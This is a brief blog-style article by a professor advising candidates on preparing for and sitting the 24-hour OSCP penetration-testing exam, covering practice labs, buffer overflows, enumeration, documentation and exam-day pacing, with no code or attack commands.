Preparing for and taking the OSCP
The OSCP certification is a mythical rite-of-passage for many within the Cybersecurity field, one of the few certifications that requires you to actually hack several machines and demonstrate real practical skills. This ain’t no multiple-choice test. However, it does not have to be as daunting as many make it seem. If you know what to prepare for and what not to from the outset, you can tackle it in your first attempt. However, if you do not pass on your first attempt, don’t worry, many people take it several times and a retake is relatively inexpensive.
When you sign up for the course\exam, you can purchase 30, 60, or 90 days of lab time. Your decision will depend on several factors and how prepared you already feel going in. Your purchase will include lab time, a lengthy PDF manual, video lessons, and an exam attempt. The name of the course is Penetration Testing with Kali Linux (PWK) by Offensive Security and it culminates in taking the OSCP certification exam. The exam itself is 24 hours straight, and there are 5 machines for you to hack on the exam.
Preparing for the exam
The best way to prepare for the OSCP is by popping boxes on VulnHub and HackTheBox. You can find write-ups/walk-throughs that show you how to pwn them. My favorite is YouTube walkthroughs. You will need to ween yourself off these as you get closer to taking the exam. Many people report these helped them more than the actual PWK labs, stating that the PWK lab machines are very different from the exam machines.
You will certainly want to know your way around Kali Linux and all its major tools. Be comfortable and quick at the Linux command line before taking the test. You should also have some experience with coding and scripting, enough to be able to edit existing exploit code to make it work in various scenarios.
For the sake of efficiency, you do not need to study or practice Active Directory, pivoting, or social engineering for the OSCP, these technologies and tactics are not tested on the actual exam. One thing you do need to study is Buffer Overflows because one of the machines on the test is a BO exploit. Practice doing Buffer Overflows until you feel comfortable with it.
Most of the boxes on the exam are well patched, so, expect to be utilizing the less-easy exploits, misconfigurations, and application vulnerabilities. Forget about using kernel exploits on the exam. Learn both Windows and Linux privilege escalation techniques.
You should be familiar with your methodology by the time you go into the exam. Know your process, the general steps you are going to take, and the main tools you are going to use.
Lastly, do lots of research! This article is meant to be a brief overview, but you will want to do plenty of research on your own while preparing for the OSCP.
You will need to document everything you do during the exam, because you must write a report detailing all the steps you took to earn a passing score. So, take screenshots of every step. Many people use Cherry Tree or other applications for documentation. I prefer OneNote and Google Docs since they are automatically synched to the cloud. Some recommend recording your exam with a program like OBS, but that is up to you.
The common consensus is that the crux of the OSCP is “enumeration, enumeration, enumeration.”
Scan the network, enumerate everything about the hosts. Check ports, processes, services, and version numbers. Run go Buster or dirt buster on any web service you find.
Most people recommend starting with the Buffer Overflow machine, then proceeding to the lowest hanging fruit, and working your way up. Save Metasploit for the very end. Met a sploit is only useable once during the test, so, only use it when you are really stuck. However, you can use msfvenom and search sploit as much as you want.
Multitask. You should always be running a foreground process and a background process. Don’t sit and wait for scans to finish, let them run in the background.
There is most likely an existing exploit out there that will work for you with a little tweaking. You can find exploits on sites such as packetstormsecurity.com, exploit-db.com, and several others. It is important to keep a cool head while taking the exam. Many have reported psyching themselves out and having their nerves get the best of them. Take breaks, go outside, drink tea, whatever you need to do to clear your head from time to time. 24 hours is enough time to pass.
Professor William Colachicco
Orlando, FL in the US